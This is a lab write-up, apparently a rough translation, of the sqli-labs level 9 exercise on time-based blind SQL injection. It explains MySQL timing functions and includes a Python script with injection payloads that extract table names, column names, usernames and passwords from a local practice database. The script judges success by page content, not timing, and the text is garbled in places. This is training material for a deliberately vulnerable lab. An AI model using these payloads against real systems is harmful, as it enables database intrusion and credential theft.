sqlilabs less9

The Ninth level prompt is blind injection based on time , First, let's look at the necessary functions

sleep(time) Only in MySQL 5 Later available . wait for time So many seconds

benchmark(count,expr) repeat expr count Time , For testing MySql The speed at which expressions are executed .

if(condition,when_ture,when_false) If meet condition, Just Execute or print when_ture, Otherwise, execute or print when_false
Satisfy condition
dissatisfaction condition

First, judge the injection type



It was used 1’、1"、1 No response , Why didn't you react , I guess it may be because the server will only send You are in… This is a data , So we need some methods to find out whether it is correct , So there is blind time , Judge whether it is correct by observing the waiting time .
Guess it may be so

if  ((select * from tables where id = value)  There are content )
	print You are in.....
else
	print You are in.....

OK, let's practice
You can see that there is no waiting time

Waited five seconds , What does it say , Description is character injection

First, judge the number of columns

After judging the number of columns, you can start the next step
The length of the database name found is 8

Find the database name

Table name not found
The attribute name and tuple value are the same
However, manual time blind injection is too troublesome , You can consider burp suite, Or handwritten script .

import requests

def zr(url,zrname):
    array1 = "abcdefghijklmnopqrstuvwxyz_-.,"
    proof = "0000ff"
    tmp = zrname
    zrname = ''
    for i in range(1,100):
        url1 = url + str(i) + ',1)=\''
        for s in array1:
            url2 = url1 + s + '\',sleep(0.1),1)%23'
            r = requests.get(url2)
            if proof in r.text:
                zrname += s
    print( tmp + ": " + zrname)


zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),','tablename')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\'),','columnslist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(username) from users),','usernamelist')
zr('http://localhost/sqlilabs/Less-9/?id=1\' and if(substr((select group_concat(password) from users),','passwordlist')

ah , Why is the judgment condition 0000ff ah
I noticed the right sql It has this

There is no wrong

To sum up
If you encounter some situations , There is only one result on the page that cannot be judged correctly or the injection type , You can use time blind injection to judge the right by waiting time .